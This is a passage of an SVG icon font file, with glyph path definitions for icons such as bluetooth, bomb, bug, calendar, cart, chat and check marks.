m247-104c-82 2-148 70-146 152 1 82 69 147 152 146 80-2 146-70 145-149-2-84-68-150-151-149z m-146 462c23 11 46 19 72 16 8-1 15-2 23-3-13 32-51 50-86 41-35-9-60-42-56-75 16 7 32 14 47 21z m-246 15c25-2 47-14 69-24 8-4 16-7 24-10 1 35-25 67-60 74-34 7-72-13-81-40 16 0 32 1 48 0z m483-247c43-43 42-108 14-145 3 47-9 86-40 118-32 32-71 44-116 42 35 26 99 28 142-15z m-676-8c-40-48-29-112-7-135-3 45 9 84 41 116 31 31 70 44 116 42-38 28-108 28-150-23z" />
<glyph glyph-name="bluetooth" horiz-adv-x="1000" unicode="&#xeebe;" d="M759 558l-211 210c-11 11-29 20-41 20-12 0-22-13-22-28v-277c0-15-9-19-19-8l-163 162c-11 11-28 11-39 0l-22-23c-11-10-11-28 0-38l206-207c11-10 11-28 0-38l-206-207c-11-10-11-28 0-38l22-23c11-11 28-11 39 0l163 163c10 10 19 7 19-8v-278c0-15 10-28 22-28 12 0 30 9 41 20l211 210c10 11 10 28 0 39l-150 150c-11 10-11 28 0 38l150 150c10 11 10 28 0 39z m-167 44l44-45c11-10 11-28 0-38l-44-44c-11-11-20-7-20 8v111c0 15 9 19 20 8z m44-459l-44-45c-11-11-20-7-20 8v112c0 15 9 18 20 8l44-45c11-10 11-28 0-38z" />
<glyph glyph-name="bomb" horiz-adv-x="1000" unicode="&#xeebf;" d="M671 683l45-1c3 0 6 2 6 6l0 13c0 3-2 6-5 6l-45 0c-3 1-6-2-6-5l0-13c0-3 2-6 5-6z m106 23c2-3 5-4 8-2l35 21c3 2 4 6 2 8l-7 12c-1 2-5 3-7 1l-36-21c-2-2-3-5-2-8l7-11z m-59 34c1-3 4-5 7-4l12 5c3 1 5 5 4 8l-14 35c-1 3-5 4-7 3l-13-5c-3-1-4-4-3-7l14-35z m-116-194v63h-81c11 38 37 66 87 47 30-11 58-29 88-41 19-8 50-19 69-3 24 20 9 59 0 82-5 16-30 9-25-6 4-11 23-52 5-58-12-4-31 6-42 10-30 11-58 29-88 41-67 28-105-17-120-72h-97v-62c-129-43-223-165-223-309 0-180 146-326 325-326s325 146 325 326c0 144-93 266-223 308z m-80-560c-20 0-36 17-35 37 0 20 17 35 37 34 115-3 159 125 161 131 6 17 24 27 41 24 2-1 3-1 4-2 19-6 29-26 23-45-2-7-62-184-231-179z" />
<glyph glyph-name="book-mark" horiz-adv-x="1000" unicode="&#xeec0;" d="M231 766v-842c0-12 7-15 15-7l240 247c8 8 21 8 29 0l240-247c8-8 15-5 15 7v842c0 12-10 22-21 22h-497c-12 0-21-10-21-22z" />
<glyph glyph-name="box" horiz-adv-x="1000" unicode="&#xeec1;" d="M147 574l-83-178c-4-9 3-18 12-17l312 31c5 0 9 3 10 7l101 227-343-63c-4-1-7-4-9-7z m329-60l-52-126c-2-5-6-7-10-8l-265-23c-7-1-12-6-11-13l5-208c0-5 4-10 10-11l312-66c7-2 15-2 23-2v454c0 17-6 18-12 3z m460-118l-83 178c-1 3-5 6-9 7l-343 63 101-227c2-4 5-6 10-7l312-31c9-1 16 8 12 17z m-85-39l-265 23c-4 1-8 3-10 8l-52 126c-6 15-12 14-12-3v-454c8 0 16 0 24 2l311 66c6 1 10 6 10 11l6 208c0 7-5 12-12 13z" />
<glyph glyph-name="briefcase" horiz-adv-x="1000" unicode="&#xeec2;" d="M588 219h-176v80h-349v-240c0-22 18-40 40-40h794c22 0 41 18 41 40v240h-350v-80z m309 361h-272v88c0 15-10 13-10 13h-254s-11-1-11-14v-87h-247c-22 0-40-18-40-41v-181h875v181c0 23-19 41-41 41z m-314 0h-191v71h191v-71z" />
<glyph glyph-name="broken" horiz-adv-x="1000" unicode="&#xeec3;" d="M594 686l-27 5-14-79 26-5 15 79z m306-452l-185 184-66 8 9-65 185-184c19-19 19-50 0-70l-53-52c-20-20-51-20-70 0l-184 184-65 9 8-66 184-185c51-50 133-50 184 0l53 53c50 51 50 134 0 184z m-286 399l64 48 16-21-63-48-17 21z m-7-53l78 14 5-26-79-15-4 27z m-189-268l-25 60-225 131c-24 14-32 44-18 68l38 64c13 24 44 32 67 18l225-131 65 7-24 62-225 132c-62 36-142 15-178-47l-38-65c-36-62-15-141 47-177l225-132 66 10z m-29-193l23-11 31 69-23 11-31-69z m-71 48l12-22 66 37-12 22-66-37z m9 81l-1-25 75-4 2 25-76 4z" />
<glyph glyph-name="bucket" horiz-adv-x="1000" unicode="&#xeec4;" d="M85 603c30-208 61-415 90-623 3-16 8-21 23-20 47 0 94 0 141 0 151 0 302 0 453 0 15 0 26 0 28 20 3 38 12 75 17 113 6 36 11 72 17 108-37 2-71 1-104 6-108 19-188 78-247 169-9 13-16 24-34 29-28 7-41 37-36 70 4 28 26 46 55 47 43 1 67-33 59-80-2-8-1-19 3-26 70-108 164-166 296-153 15 2 20 7 22 20 12 83 26 166 38 249 5 29 9 58 13 86h-834c0-5-1-10 0-15z m852 100c-2 21-14 33-35 36-9 1-19 1-29 1-125 0-249 0-374 0-123 0-247 0-370 0-10 0-20 0-30-1-22-3-34-16-36-37-2-22 9-37 29-43 9-3 18-4 27-4 254 0 507 0 761 0 10 0 20 1 29 4 21 7 31 23 28 44z" />
<glyph glyph-name="bucket1" horiz-adv-x="1000" unicode="&#xeec5;" d="M196 388c23-154 45-307 67-460 2-12 6-16 17-16 35 1 69 1 104 1 112 0 223 0 334 0 12 0 19 0 21 15 3 28 9 55 13 83 4 26 8 53 12 80-27 1-52 0-77 4-79 14-139 58-182 125-6 10-12 18-25 21-20 5-31 28-27 52 3 21 20 34 41 35 32 0 50-25 43-59-1-6 0-14 3-19 51-80 121-123 219-113 11 1 14 5 15 15 10 61 20 122 29 184 3 21 6 42 9 63h-616c0-4 0-8 0-11z m32 141c13 8 14 18 3 38-8 16-13 33-2 50 12 17 31 20 50 18 21-2 36-12 47-29 4-6 6-15 11-20 7-7 17-14 25-14 6 0 14 10 19 16 4 6 4 14 7 21 20 56 74 91 130 85 72-7 117-57 121-135 1-12 0-26 14-29 9-1 22 2 31 8 31 23 61 18 81-15 3-5 10-12 14-11 5 1 11 8 13 13 14 36-7 73-46 76-20 2-40-1-62-2-13 77-57 130-136 144-85 15-150-21-192-90-26 9-49 23-73 26-39 5-74-7-96-42-22-34-12-66 7-98 9-14 21-18 34-10z m598-67c-2 15-11 24-26 26-7 1-15 1-22 1l-276 0h-274c-7 0-14 0-22-1-16-2-25-12-26-28-2-15 6-26 21-31 7-2 14-3 20-3 188 0 375 0 563 0 7 0 14 1 21 3 15 5 22 17 21 33z m-94 168c40 0 72 32 72 72 0 41-33 74-72 74-39-1-72-34-73-73 0-40 33-73 73-73z m1 115c22 0 41-19 42-42 0-23-21-44-43-43-23 0-42 20-42 42 0 24 18 43 43 43z m-400-62c29 0 54 25 54 53s-24 52-53 52c-29-1-52-24-52-52 0-28 23-52 51-53z m1 75c13 0 21-8 22-22-1-13-7-21-21-22-13-1-24 9-23 22 1 13 9 22 22 22z" />
<glyph glyph-name="bucket2" horiz-adv-x="1000" unicode="&#xeec6;" d="M720 707h3c12 0 21 11 21 23s-9 23-21 23h-3c0 0-632 0-632 0 0 0-4 0-4 0-12 0-21-10-21-23s9-23 21-23h4v-727c0-18 14-33 33-33h566c19 0 33 15 33 33v353c51-18 100-30 138-30 37 0 65 11 75 35 28 64-83 165-213 235l0 134z m-304-78c-7 6-19 16-34 21-25 7-51 0-45-15v-240c0-11-9-21-20-21-12 0-21 10-21 21v222c-8 16 16-79-55-37-41 24-36-8-40-22v-265c0-12-9-21-21-21-11 0-21 9-21 21v265c-14 3-27 9-38 14v138h296l-1-81z m489-276c-10-22-82-22-185 17v165c130-74 196-155 185-182z" />
<glyph glyph-name="bug" horiz-adv-x="1000" unicode="&#xeec7;" d="M899 283c-62 30-123 60-185 91-5 3-9 7-13 12-9 13-19 26-29 40 23 15 46 31 69 46 19 13 38 25 56 38 11 7 17 17 14 30-2 12-10 21-23 22-7 0-16-3-23-7-42-28-84-56-127-85-3-1-5-3-9-6 5 14 11 27 13 40 8 43-6 80-32 114-4 6-5 10-2 17 10 29 23 55 46 77 13 12 29 19 48 19 18 0 30 12 30 28 0 15-14 29-31 28-45-1-80-20-106-56-15-21-27-44-41-67-17 7-35 11-54 11-19 0-37-4-54-11-14 23-26 46-41 67-26 36-61 55-106 56-17 1-31-13-31-28-1-16 12-28 30-28 19 0 34-7 48-19 22-21 36-48 46-77 3-7 2-11-2-17-26-33-40-71-32-113 2-14 8-26 13-41-4 3-7 5-10 7-42 28-84 56-126 84-7 4-16 7-23 7-13-1-21-10-23-22-3-13 3-23 13-30 19-12 38-25 57-37 23-16 46-32 69-47-10-14-20-27-30-40-3-5-7-9-12-12-62-31-123-61-185-91-31-15-24-11-25-41-1-7 3-12 8-15 9-6 19-6 28-1 6 3 11 6 17 9 43 22 86 43 128 64-4-30-10-59-12-89-1-15-5-26-14-38-31-42-62-84-93-126-11-14-9-32 4-41 13-10 31-7 41 7 9 11 18 23 27 35 15 19 30 39 46 60 4-12 7-23 11-33 24-64 62-117 121-153 21-12 21-12 38 5 29 30 43 65 43 107 0 110 0 221 0 331 0 19 11 29 28 29 1 0 2 0 3 0 1 0 1 0 2 0 18 0 28-10 28-29 0-110 0-221 0-331 0-42 14-77 43-107 17-17 17-17 38-5 59 36 97 89 121 153 4 10 7 21 11 33 16-21 31-41 46-60 9-12 18-24 27-35 11-14 28-17 41-7 13 9 15 27 5 41-31 42-62 85-94 126-9 12-13 23-14 38-2 30-7 59-11 89 41-21 84-42 127-64 6-3 11-6 17-9 10-5 19-5 28 1 6 3 9 8 9 15-1 30 6 26-25 41z m-371 225c0-13-11-24-24-24h-8c-13 0-24 11-24 24v52c0 13 11 24 24 24h8c13 0 24-11 24-24v-52z" />
<glyph glyph-name="building" horiz-adv-x="1000" unicode="&#xeec8;" d="M810 788h-620v-73h34v-803h552v803h34v73z m-288-364h114v-114h-114v114z m-158 158h115v-115h-115v115z m115-430h-115v115h115v-115z m0 158h-115v114h115v-114z m157-158h-114v115h114v-115z m0 315h-114v115h114v-115z" />
<glyph glyph-name="bulb-alt" horiz-adv-x="1000" unicode="&#xeec9;" d="M500 698c10 0 18 8 18 18v54c0 10-8 18-18 18s-18-8-18-18v-54c0-10 8-18 18-18z m-188-38c4-5 10-9 16-9 3 0 6 1 9 3 8 5 11 16 6 24l-26 47c-5 8-16 11-25 6-8-4-11-15-6-24l26-47z m-101-103l-46 27c-9 5-20 2-25-7-4-8-1-19 7-24l46-27c3-2 6-2 9-2 6 0 12 3 15 9 5 8 2 19-6 24z m-56-172h-52c-10 0-18-8-18-18 0-10 8-18 18-18h52c10 0 18 8 18 18 0 10-8 18-18 18z m743 0h-53c-10 0-18-8-18-18 0-10 8-18 18-18h53c9 0 17 8 17 18s-8 18-17 18z m-38 192c-5 9-16 12-24 7l-46-27c-9-5-12-16-7-24 3-6 9-9 16-9 3 0 6 1 8 2l46 27c9 5 12 16 7 24z m-196 77c2-2 6-3 8-3 7 0 12 4 16 9l26 47c5 8 2 19-6 24-9 5-19 2-24-6l-27-47c-5-8-2-19 7-24z m-184-360c2-12 8-16 20-16 12 0 19 4 21 16l14 96c1 6 2 13 2 19v47c0 21-14 32-37 32s-36-11-36-32v-47c0-6 1-13 2-19l14-96z m20-42c-21 0-38-18-38-40s17-39 38-39 38 18 38 39-17 40-38 40z m-66 361c-114-32-184-109-202-225-19-113 21-207 113-277 15-12 32-26 37-43 15-45 44-61 89-56 10 2 20 1 30 1h42c43 0 53 8 72 46 8 17 18 36 33 46 88 64 129 149 125 257-8 169-176 295-339 251z m189-459c-19-15-36-34-50-54-29-46-112-48-143-4-17 23-37 46-60 63-77 61-108 165-75 259 32 93 118 152 217 149 113-3 207-106 207-234-1-70-33-132-96-179z m-64-176c-19 1-39 0-58 0-19 0-39 1-58 0-7-1-17-4-20-10-3-5 1-15 5-21 32-46 114-46 146 0 4 5 8 16 5 21-2 6-13 9-20 10z" />
<glyph glyph-name="bullet" horiz-adv-x="1000" unicode="&#xeeca;" d="M645 464c0 18-1 36-4 54-15 81-55 151-101 218-9 13-18 26-29 40-7 9-14 14-16 10-2-2-3-4-4-6-32-52-67-102-96-156-30-53-41-112-40-174 1-111 0-223 0-335v-11c0-6 10-11 21-11h246c12 0 22 3 22 8 1 3 1 5 1 8 0 119 0 237 0 355z m-22-404h-245c-12 0-22-10-22-22v-105c0-11 10-21 22-21h245c11 0 21 10 21 22v104c0 12-10 22-21 22z" />
<glyph glyph-name="bullhorn" horiz-adv-x="1000" unicode="&#xeecb;" d="M323 547c-17-6-33-15-51-17-35-5-71-6-106-9l-48-4c-11-1-14-4-13-15 0-2 0-5 1-7-12-1-21-2-31-3-10-1-13-4-12-14 3-50 7-99 11-149 0-10 4-13 14-12 10 0 20 1 31 2 0-4 0-6 0-9 1-10 3-11 13-10 16 1 32 2 48 3 14 1 14 1 21-12 9-19 18-38 27-57l105-215c7-13 10-15 24-13 19 1 38 2 57 4 10 1 13 4 8 14-5 11-11 23-17 35-34 69-68 139-103 208-4 10-5 19 2 28 7 8 16 10 26 7 110-27 219-54 328-81 14-3 28-7 42-10-12 158-23 316-35 474-3 0-5-1-8-2-111-45-223-91-334-136z m430 140c-3 3-7 8-10 8-18 0-37-2-56-3 12-162 24-322 36-483 17 1 33 2 49 3 13 1 16 4 15 18l-33 450c-1 2 0 5-1 7z m102-296c-12 7-26 3-33-9-5-10-3-22 7-29 19-15 39-29 59-43 2-1 4-2 5-2 12-4 23 1 28 12 5 8 2 22-6 28-20 15-40 29-60 43z m-38 138c9-6 20-5 29 3 17 16 34 32 50 49 3 3 5 7 6 8 3 13-1 23-9 28-10 6-21 5-29-2-17-17-34-33-50-50-3-2-5-5-6-9-4-10 0-21 9-27z m98-38c-25-1-51-3-76-6-11-1-18-11-18-22 0-11 6-20 18-23 0 0 2-1 3-1 26 2 52 4 77 6 12 2 19 13 19 24-1 12-11 22-23 22z" />
<glyph glyph-name="bullseye" horiz-adv-x="1000" unicode="&#xeecc;" d="M890 594c-14 1-29 1-43 2-5 0-9 1-11 8-1 5-7 10-11 17 10 27 21 56 33 86l-2 2c-8-5-15-10-22-15-18-11-35-22-52-34-4-3-8-7-10-12-9-21-17-42-25-64-1-3-4-7-6-8-17-11-33-22-50-33-64 84-148 132-253 141-92 8-175-18-247-76-142-116-168-317-69-464 105-156 309-196 463-106 161 94 204 283 150 420-20-12-39-24-58-37-2-2-2-8-1-11 7-29 11-58 9-88-5-76-36-140-93-190-58-52-127-75-205-69-138 12-245 123-252 262-9 163 130 300 293 288 79-6 144-40 195-100 2-3 4-6 6-9l-73-47c-40 47-91 71-154 69-44-1-83-17-116-47-71-62-85-163-34-243 48-76 146-107 230-72 87 36 128 126 113 204-7-5-15-9-22-14-13-9-27-17-40-26-4-3-7-8-8-13-14-57-58-93-116-94-63 0-118 56-116 119 3 76 72 129 145 111 22-5 41-16 58-34-18-12-35-23-53-34-1-1-6 0-8 2-21 10-45 7-62-9-16-16-20-40-11-61 10-21 35-34 58-29 24 5 41 24 42 48 1 6 3 10 8 13 98 63 195 126 293 189 4 3 9 5 14 4 23 0 46-2 68-3 4-1 8-1 11 1 26 17 53 34 81 53-17 1-32 2-47 3z" />
<glyph glyph-name="calendar" horiz-adv-x="1000" unicode="&#xeecd;" d="M739 697c0 13 0 25 0 37-1 23-15 43-38 51-23 7-48-1-62-19-8-11-12-23-12-36v-33c0-5-4-9-9-9h-59c-5 0-10 4-10 9 0 11 1 22 0 33 0 26-13 46-35 54-37 13-75-12-76-50 0-12 0-24 0-37 0-5-4-9-10-9h-60c-5 0-10 4-10 9 1 16 2 31 0 45-2 21-16 36-36 43-20 6-39 2-55-11-15-12-19-28-19-46 0-11 0-21 0-31 0-6-4-10-10-10h-164c-6 0-10-4-10-9v-756c0-5 5-9 10-9h852c5 0 10 4 10 9v756c0 5-5 9-10 9h-178c-5 0-9 4-9 10z m-413-747h-214c-6 0-10 4-10 9v150c0 5 5 9 10 9h214c5 0 9-4 9-9v-150c0-5-4-9-9-9z m0 207h-214c-6 0-10 4-10 9v158c0 5 5 9 10 9h214c5 0 9-4 9-9v-158c0-5-4-9-9-9z m0 215h-214c-6 0-10 4-10 9v152c0 5 5 9 10 9h214c5 0 9-4 9-9v-152c0-5-4-9-9-9z m285-422h-227c-5 0-9 4-9 9v149c0 5 4 10 9 10h227c5 0 9-5 9-10v-149c0-5-4-9-9-9z m10 212c-1-3-5-6-10-6h-227c-5 0-9 5-9 10v158c0 5 2 9 5 10l6 0c74 0 149 0 223 0 9 0 12-2 12-11 0-52 0-104 0-156 0-2 0-4 0-5z m0 215c0-3-4-5-10-5h-227c-5 0-9 4-9 9v152c0 5 2 10 5 10h6c74 0 149 0 223 0 9 0 12-2 12-12 0-49 0-99 0-149v-5h0z m48-44h219c5 0 9-4 9-9v-158c0-5-4-10-9-10h-219c-6 0-10 5-10 10v158c0 5 4 9 10 9z m219-383h-219c-6 0-10 4-10 9v149c0 6 4 10 10 10h219c5 0 9-4 9-10v-149c1-5-4-9-9-9z m0 422h-219c-6 0-10 4-10 9v152c0 5 4 9 10 9h219c5 0 9-4 9-9v-152c1-5-4-9-9-9z" />
<glyph glyph-name="camera-alt" horiz-adv-x="1000" unicode="&#xeece;" d="M917 575h-542v62c0 11-9 20-21 20h-175c-11 0-20-9-20-20v-62h-76c-11 0-20-9-20-20v-491c0-12 9-21 20-21h834c11 0 20 9 20 21v491c1 11-9 20-20 20z m-258-334c-26-62-88-106-160-106-71 0-133 43-159 104-9 21-14 44-14 69 0 95 77 173 173 173s173-77 173-173c0-24-5-46-13-67z m-58 68c0-55-45-101-101-101s-101 46-101 101 45 101 101 101 101-45 101-101z" />
<glyph glyph-name="camera" horiz-adv-x="1000" unicode="&#xeecf;" d="M819 567h-124v68c0 32-22 58-48 58h-294c-26 0-48-26-48-58v-68h-9c-39 0-79 0-118 0-65 0-115-50-115-115v-329c0-66 49-116 115-116h642c7 0 14 0 21 2 59 10 97 56 97 116v324c0 69-50 118-119 118z m-439 46c0 22 18 39 39 39h162c21 0 39-17 39-39v-8c0-21-18-39-39-39h-162c-21 0-39 18-39 39v8z m118-527c-110 0-200 92-199 203 1 110 91 200 202 199 111-1 201-91 200-201-1-112-91-202-203-201z m2 336c-74 0-136-60-136-133 0-76 61-137 135-138 74 0 137 62 136 136 0 75-60 135-135 135z" />
<glyph glyph-name="card" horiz-adv-x="1000" unicode="&#xeed0;" d="M865 652h-730c-40 0-72-32-72-72v-33h0v-427c0-39 32-72 72-72h730c40 0 73 32 73 72v460c0 40-33 72-73 72z m-393-282c0 6 5 12 11 12h226c6 0 11-6 11-12v-30c0-6-5-12-11-12h-226c-6 0-11 5-11 12v30z m-50-118c0-6-5-11-11-11h-218c-6 0-12 5-12 11v196c0 6 6 11 12 11h218c6 0 11-5 11-11v-196z m349 0c0-6-5-11-11-11h-277c-6 0-11 5-11 11v31c0 6 5 11 11 11h277c6 0 11-5 11-11v-31z m48 165c0-6-5-11-12-11h-324c-6 0-11 5-11 11v31c0 6 5 11 11 11h324c7 0 12-5 12-11v-31z" />
<glyph glyph-name="cart-alt" horiz-adv-x="1000" unicode="&#xeed1;" d="M820 268h-399c-6 0-13 4-16 10l-183 419c-2 6-9 10-15 10h-134c-6 0-11-5-11-11v-33c0-6 5-11 11-11h98c6 0 13-4 15-10l184-419c2-6 9-10 15-10h435c6 0 11 5 11 11v33c0 6-5 11-11 11z m-346-110c-45 0-82-37-82-82s37-83 82-83 83 37 83 83-37 82-83 82z m275 0c-46 0-83-37-83-82s37-83 83-83 82 37 82 83-37 82-82 82z m181 439h-582c-6 0-9-4-7-10l14-35c2-5 9-10 15-10h538c6 0 13 5 15 10l14 35c2 6-1 10-7 10z m-88-219h-406c-6 0-9-5-7-10l14-35c2-6 9-10 15-10h362c6 0 13 4 15 10l14 35c2 5-1 10-7 10z m44 110h-494c-6 0-9-5-7-10l14-35c2-6 9-10 15-10h450c6 0 13 4 15 10l14 35c2 5-1 10-7 10z" />
<glyph glyph-name="cart" horiz-adv-x="1000" unicode="&#xeed2;" d="M893 569l-631 0-27 91c-4 14-15 25-28 28l-93 25c-4 1-7 2-11 2-18 0-34-13-39-30-3-11-2-22 4-31s14-17 25-20l70-19 143-516c-20-10-33-31-33-54 0-33 27-61 60-61s60 28 60 61c0 1 0 2 0 2h292c0-1 0-1 0-2 0-33 27-61 60-61s60 28 60 61c0 31-23 56-53 60-72 12-368 26-368 26l-9 38h368c19 0 36 13 41 31l80 281h29c25 0 45 19 45 44 0 24-20 44-45 44z m-469-306h-70c-1 0-4 0-5 4-2 6-4 13-4 13l-55 191c0 1 0 2 1 3 1 1 1 1 2 1h84c2 0 3-1 3-2l46-205 0-1c1 0 1-1 1-1 0-2-2-3-3-3z m176 209l-37-207c-1-1-2-2-3-2h-52c-2 0-3 1-3 2l-38 206c0 1 0 2 1 3 0 1 1 1 2 1h127c1 0 2 0 2-1 1-1 1-2 1-2z m177-1l-59-206c0-1-1-2-3-2h-71c-1 0-2 0-3 1 0 1-1 2 0 3l46 206c0 1 1 2 3 2h84c1 0 2 0 2-1 1-1 1-2 1-3z" />
<glyph glyph-name="cc" horiz-adv-x="1000" unicode="&#xeed3;" d="M500 788c-242 0-437-196-437-438 0-241 195-438 437-438s438 197 438 438c0 242-196 438-438 438z m-60-614c-13-2-27-3-43-3-27 0-51 4-72 13-20 9-38 21-52 37-14 16-24 35-31 57-7 22-11 46-11 71 0 26 4 50 11 72 8 22 18 41 32 57 14 16 32 29 52 38 20 9 44 13 70 13 15 0 29-1 42-3 13-2 27-6 42-12 0-9-2-19-5-28-3-9-7-18-11-28-11 4-21 7-30 8s-19 3-31 3c-30 0-54-10-71-30s-25-50-25-90c0-78 34-117 100-117 12 0 23 0 32 2 9 2 19 4 30 8 4-9 8-18 10-28 3-9 5-19 6-28-16-6-31-10-45-12z m284 0c-14-2-28-3-43-3-28 0-52 4-72 13-21 9-38 21-52 37-14 16-25 35-32 57-7 22-10 46-10 71 0 26 4 50 11 72 7 22 18 41 32 57s31 29 52 38c20 9 43 13 69 13 16 0 30-1 43-3 13-2 27-6 42-12-1-9-2-19-6-28-3-9-6-18-10-28-12 4-22 7-30 8-9 2-19 3-31 3-31 0-55-10-71-30-17-20-25-50-25-90 0-78 33-117 100-117 12 0 22 0 31 2s19 4 31 8c4-9 7-18 10-28 3-9 5-19 6-28-17-6-32-10-45-12z" />
<glyph glyph-name="charging" horiz-adv-x="1000" unicode="&#xeed4;" d="M926 423h-50c-6 0-11 5-11 11v124c0 6-5 11-11 11h-780c-6 0-11-5-11-11v-415c0-6 5-11 11-11h780c7 0 12 5 12 11v123c0 6 5 12 11 12h49c6 0 11 5 11 11v123c1 6-5 11-11 11z m-135-206c0-7-5-12-11-12h-634c-6 0-11 5-11 12v267c0 6 5 11 11 11h634c6 0 11-5 11-11v-267z m-341 126c-46 13-92 25-138 38l0-1c62-36 125-73 188-109-4 28-7 55-11 83 43-11 85-23 126-34l0 1c-57 36-114 72-172 109 2-29 5-58 7-87z" />
<glyph glyph-name="chat" horiz-adv-x="1000" unicode="&#xeed5;" d="M937 633c0 11 0 23-3 34-14 62-64 101-129 101-204 0-408 0-612 0-75 0-130-56-130-131-1-133-1-265 0-398 0-11 1-22 3-32 14-59 63-99 124-100 25 0 50 0 78 0-4-19-7-36-12-52-10-35-23-68-46-97-10-13-5-24 11-25 11-1 24-1 34 3 40 18 79 37 117 58 45 25 74 67 108 104 6 6 11 9 20 9 103 0 206-1 308 0 75 1 129 57 130 131 0 132 0 263-1 395z" />
<glyph glyph-name="check-alt" horiz-adv-x="1000" unicode="&#xeed6;" d="M415 134c-8-8-17-11-27-11-9 0-18 3-26 11l-162 162 52 53 136-137 363 366 49-53-385-391z" />
<glyph glyph-name="check-circled" horiz-adv-x="1000" unicode="&#xeed7;" d="M687 551c-3 3-9 3-13-1-83-88-166-176-249-264-4-4-10-4-13 0l-89 88c-3 4-9 4-13 0l-53-53c-4-4-4-10 0-14l158-158c3-3 9-3 13 1 105 111 210 223 316 335 3 4 3 9-1 13-18 18-37 35-56 53z m-187 237c-242 0-437-196-437-438s195-438 437-438 438 196 438 438-196 438-438 438z m0-807c-203 0-369 166-369 369s166 369 369 369c204 0 369-165 369-369s-165-369-369-369z" />
<glyph glyph-name="check" horiz-adv-x="1000" unicode="&#xeed8;" d="M396 106l-193 192c-4 5-4 12 0 17l66 65c4 4 11 4 16 0l108-108c4-4 11-4 16 0 101 108 202 215 303 322 4 5 12 5 16 1l68-65c5-4 5-11 1-16-129-136-257-272-385-408-4-5-12-5-16 0z" />
<glyph glyph-name="checked" horiz-adv-x="1000" unicode="&#xeed9;" d="M705 73h-510c-7 0-12 6-12 12v510c0 7 5 13 12 13h392c7 0 17 4 22 9l102 102c5 5 3 9-4 9h-632c-7 0-12-6-12-13v-750c0-7 5-12 12-12h750c7 0 12 5 12 12v472c0 6-4 8-8 3l-103-102c-5-5-9-15-9-21v-232c0-6-5-12-12-12z m-400 365l-67-68c-5-5-5-12 0-17l186-186c5-5 13-5 18 0l492 492c5 5 5 13 0 17l-67 68c-5 5-13 5-18 0l-407-408c-5-5-13-5-18 0l-101 102c-5 4-13 4-18 0z" />
<glyph glyph-name="children-care" horiz-adv-x="1000" unicode="&#xeeda;" d="M654 435c-5 5-9 10-15 15-14-78-86-118-148-114-53 3-115 37-131 109-65-61-131-123-197-185 55-54 154-61 219-12 24 18 45 40 67 61 7 6 12 12 18 18v-398c0-9 8-17 18-17h29c10 0 18 8 18 17v399c62-59 125-118 188-178 3 4 7 7 10 11 55 64 50 153-11 212-21 21-43 42-65 62z m-300 58c2-2 4-4 6-5 14 62 54 99 121 112-4 3-7 5-9 7-47 44-94 89-142 133-16 16-32 32-49 48h-1c-2-2-3-4-5-5-60-61-59-160 3-219 25-24 51-47 76-71z m284-3c66 62 132 123 199 186-1 1-2 1-3 2-66 58-167 58-233-2-26-23-52-48-77-72-2-1-3-3-4-4 66-14 105-51 118-110z m-259-23c0-63 57-113 122-112 65 1 120 53 119 113-1 63-55 115-121 114-68-2-120-49-120-115z m120 81c47 1 85-35 86-80 0-43-39-79-84-80-47-1-87 35-87 79 0 47 37 81 85 81z m1-134c31 0 58 25 57 54 0 30-26 55-58 55-33-1-57-24-57-55-1-30 27-55 58-54z" />
<glyph glyph-name="clip" horiz-adv-x="1000" unicode="&#xeedb;" d="M886 445c-9 0-17-4-23-9l0 0-400-401c-35-35-81-54-131-54s-95 19-130 54c-72 72-72 189 0 260l386 387c25 24 57 38 92 38 35 0 67-14 92-38 24-25 37-54 35-84-1-30-15-60-40-85l-309-309c-14-14-33-22-53-22-38 0-58 24-58 48 0 20 8 38 22 52l267 266-1 0c5 6 8 14 8 22 0 19-15 34-34 34-8 0-15-3-21-8l-1 0-265-265c-30-30-43-59-43-101 0-33 12-62 34-83 23-21 54-33 92-33h0c39 0 75 15 102 43l308 308c78 78 80 189 5 265-37 37-87 58-140 58-53 0-103-21-140-58l-386-387c-99-98-99-258 0-357 47-47 111-74 178-74s131 27 179 74l400 402s9 8 9 23c0 19-16 34-34 34z" />
<glyph glyph-name="clock-time" horiz-adv-x="1000" unicode="&#xeedc;" d="M500 788c-239 0-432-193-437-428-5-245 189-444 430-448 251-3 440 198 444 429 5 246-194 447-437 447z m3-788c-196-1-353 156-353 350 0 193 157 350 350 350 193 0 349-157 350-350 1-186-150-348-347-350z m27 612h-59c-4 0-7-3-7-7v-210c0-4-4-7-8-7h-134c-4 0-7-3-7-7v-60c0-4 3-7 7-7h208c4 0 7 3 7 7v284c0 4-3 7-7 7z" />
<glyph glyph-name="close-circled" horiz-adv-x="1000" unicode="&#xeedd;" d="M703 501c6 6 6 16 0 22l-33 34c-6 6-16 6-22 0-46-47-91-93-137-140-6-6-16-6-22 0-46 47-91 93-137 140-6 6-16 6-22 0-11-12-22-23-33-35-6-6-6-16 0-22 45-45 90-92 137-139 6-6 6-16 0-22-46-47-92-93-137-140-6-6-6-16 0-22l33-34c7-6 16-6 22 0l137 139c6 6 16 6 22 0 46-46 91-92 137-139 6-6 16-6 22 0 11 12 22 23 33 34 6 6 6 16 0 22-45 46-90 93-136 140-6 6-6 16 0 22 45 47 91 93 136 140z m-203 287c-242 0-437-196-437-438s195-438 437-438 438 196 438 438-196 438-438 438z m0-807c-203 0-369 166-369 369s166 369 369 369 369-165 369-369-165-369-369-369z" />
<glyph glyph-name="close-line-circled" horiz-adv-x="1000" unicode="&#xeede;" d="M682 558l-182-182-182 182-26-26 182-182-182-182 26-26 182 182 182-182 26 26-182 182 182 182-26 26z m127 101c-85 86-188 129-309 129s-224-43-309-129-128-188-128-309 42-224 128-309 188-129 309-129 224 43 309 129 129 188 129 309-43 224-129 309z m-25-593c-77-77-172-116-284-116s-207 39-284 116-116 172-116 284 39 207 116 284 172 116 284 116 207-39 284-116 116-172 116-284-39-207-116-284z" />
<glyph glyph-name="close-line-squared-alt" horiz-adv-x="1000" unicode="&#xeedf;" d="M63 720v-740c0-37 30-67 67-67h740c37 0 67 30 67 67v740c0 37-30 68-67 68h-740c-37 0-67-31-67-68z m780-780h-686c-37 0-67 30-67 67v686c0 37 30 67 67 67h686c37 0 67-30 67-67v-686c0-37-30-67-67-67z m-573 148l230 229 230-229 33 32-230 230 230 230-33 33-230-230-230 230-32-33 229-230-229-230 32-32z" />
<glyph glyph-name="close-line-squared" horiz-adv-x="1000" unicode="&#xeee0;" d="M63 788v-876h875v876h-875z m847-848h-820v820h820v-820z m-640 148l230 229 230-229 33 32-230 230 230 230-33 33-230-230-230 230-32-33 229-230-229-230 32-32z" />
